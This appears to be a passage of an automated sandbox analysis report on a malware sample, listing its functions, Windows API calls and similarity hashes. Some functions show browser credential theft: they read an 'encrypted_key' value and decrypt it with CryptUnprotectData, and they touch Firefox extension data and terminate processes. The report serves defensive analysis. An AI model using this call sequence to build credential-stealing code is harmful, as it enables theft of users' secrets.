                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0018B3AC
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0018B4FE
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0018B519
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0018B56B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 211194620-0
                                                                                                                                                                        • Opcode ID: 9a0fe08f66a14cc0214fd0c0d101a1b873afcdfd3a65f5a4b11e5b11d0ab126d
                                                                                                                                                                        • Instruction ID: 4a1e7e2a21dabfae4e864b8405c0c879ea3a310affe5db26412c302ea927a130
                                                                                                                                                                        • Opcode Fuzzy Hash: 9a0fe08f66a14cc0214fd0c0d101a1b873afcdfd3a65f5a4b11e5b11d0ab126d
                                                                                                                                                                        • Instruction Fuzzy Hash: 38719232D00129ABDF02FBA4ED469DDBBB4EF29305F524061F911B7162DB70AE468F91
                                                                                                                                                                        Function 001A5191 Relevance: 6.1, APIs: 4, Instructions: 132COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DecodePointer__getptd_noexit__lock_siglookup
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2847133137-0
                                                                                                                                                                        • Opcode ID: d9d107a9aae9cb29647081166cb7b48929691d3f860bf324fd3e064544e134be
                                                                                                                                                                        • Instruction ID: ea4042240f7a1a14c3dacf254f242499f5566a04d5aeaa8b70cf629bc72fa638
                                                                                                                                                                        • Opcode Fuzzy Hash: d9d107a9aae9cb29647081166cb7b48929691d3f860bf324fd3e064544e134be
                                                                                                                                                                        • Instruction Fuzzy Hash: 4A419F79D08B05DBCF28DFB8D9846ACB7B2FB67351B25452BE802AB651C7749C40CB60
                                                                                                                                                                        Function 0018D3E3 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 00187FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0018E72B,?,?,?), ref: 00187FC7
                                                                                                                                                                          • Part of subcall function 00187FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FDE
                                                                                                                                                                          • Part of subcall function 00187FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FF5
                                                                                                                                                                          • Part of subcall function 00187FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0018E72B,?,?,?), ref: 0018800C
                                                                                                                                                                          • Part of subcall function 00187FAC: CloseHandle.KERNEL32(?,?,?,?,?,0018E72B,?,?,?), ref: 00188034
                                                                                                                                                                          • Part of subcall function 00191DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00196973,?), ref: 00191E0C
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,?,001B7530,001B687B), ref: 0018D474
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0018D487
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                                                                                        • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                        • API String ID: 161838763-3310892237
                                                                                                                                                                        • Opcode ID: ddb1d0bd5f24b395d08338e3263041cbbdab5f45af08db61dda0832cc302f837
                                                                                                                                                                        • Instruction ID: 68dbd204aab46bfa6cb4021f534d4931b713d20e5bc1948f7f9e2d9dd6938cb7
                                                                                                                                                                        • Opcode Fuzzy Hash: ddb1d0bd5f24b395d08338e3263041cbbdab5f45af08db61dda0832cc302f837
                                                                                                                                                                        • Instruction Fuzzy Hash: F44195369005299FCF12FFA8ED429DD77B4AF28304F524061F944B7252DB34AE4A8F91
                                                                                                                                                                        Function 0019BDC5 Relevance: 6.1, APIs: 4, Instructions: 91fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • malloc.MSVCRT ref: 0019BE0A
                                                                                                                                                                        • _memmove.LIBCMT ref: 0019BE1E
                                                                                                                                                                        • _memmove.LIBCMT ref: 0019BE6B
                                                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001,?,?,0019AEB0,?,00000001,?,?,?), ref: 0019BE8A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove$FileWritemalloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 803809635-0
                                                                                                                                                                        • Opcode ID: aaae93b94cba0fda43476bf6203154679a9565dd1eb4e6ba498b80845d8bbb2d
                                                                                                                                                                        • Instruction ID: a79e6087a2ba5dd235a0747d7612f5950c9d81f4b132387d18e5d9eda703946d
                                                                                                                                                                        • Opcode Fuzzy Hash: aaae93b94cba0fda43476bf6203154679a9565dd1eb4e6ba498b80845d8bbb2d
                                                                                                                                                                        • Instruction Fuzzy Hash: D0314D71608704AFDB25DF65EAC4AA7B7F8FB48750F50892EE64687A40EB70F9048B50
                                                                                                                                                                        Function 00192285 Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 001922AC
                                                                                                                                                                          • Part of subcall function 00191D36: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,001922D6,?), ref: 00191D41
                                                                                                                                                                          • Part of subcall function 00191D36: HeapAlloc.KERNEL32(00000000), ref: 00191D48
                                                                                                                                                                          • Part of subcall function 00191D36: wsprintfW.USER32 ref: 00191D59
                                                                                                                                                                        • OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 00192352
                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00192360
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00192367
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$Heap$AllocCloseHandleOpenTerminate_memsetwsprintf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2224742867-0
                                                                                                                                                                        • Opcode ID: b4dcbbc8b3c6854f8b07d22f7769ae74609232b4e7e6b92c4972c43aa7add1fd
                                                                                                                                                                        • Instruction ID: dda97ee5799aa7414d42a7cbe4486bcf20f14e38f42e72e437e6c71d00dd3197
                                                                                                                                                                        • Opcode Fuzzy Hash: b4dcbbc8b3c6854f8b07d22f7769ae74609232b4e7e6b92c4972c43aa7add1fd
                                                                                                                                                                        • Instruction Fuzzy Hash: 0A312D76A01218ABDF21AFA4DC849EE7BBCFF0A344F0404A6F509E6550D7349F848F52
                                                                                                                                                                        Function 0018819F Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 00187FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0018E72B,?,?,?), ref: 00187FC7
                                                                                                                                                                          • Part of subcall function 00187FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FDE
                                                                                                                                                                          • Part of subcall function 00187FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FF5
                                                                                                                                                                          • Part of subcall function 00187FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0018E72B,?,?,?), ref: 0018800C
                                                                                                                                                                          • Part of subcall function 00187FAC: CloseHandle.KERNEL32(?,?,?,?,?,0018E72B,?,?,?), ref: 00188034
                                                                                                                                                                          • Part of subcall function 00191DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00196973,?), ref: 00191E0C
                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0018CC65,?,?), ref: 001881E5
                                                                                                                                                                          • Part of subcall function 00188048: CryptStringToBinaryA.CRYPT32(00186724,00000000,00000001,00000000,?,00000000,00000000), ref: 00188060
                                                                                                                                                                          • Part of subcall function 00188048: LocalAlloc.KERNEL32(00000040,?,?,?,00186724,?), ref: 0018806E
                                                                                                                                                                          • Part of subcall function 00188048: CryptStringToBinaryA.CRYPT32(00186724,00000000,00000001,00000000,?,00000000,00000000), ref: 00188084
                                                                                                                                                                          • Part of subcall function 00188048: LocalFree.KERNEL32(?,?,?,00186724,?), ref: 00188093
                                                                                                                                                                          • Part of subcall function 001880A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0018823B), ref: 001880C4
                                                                                                                                                                          • Part of subcall function 001880A1: LocalAlloc.KERNEL32(00000040,0018823B,?,?,0018823B,0018CB6A,?,?,?,?,?,?,?,0018CC65,?,?), ref: 001880D8
                                                                                                                                                                          • Part of subcall function 001880A1: LocalFree.KERNEL32(0018CB6A,?,?,0018823B,0018CB6A,?,?,?,?,?,?,?,0018CC65,?,?), ref: 001880FD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
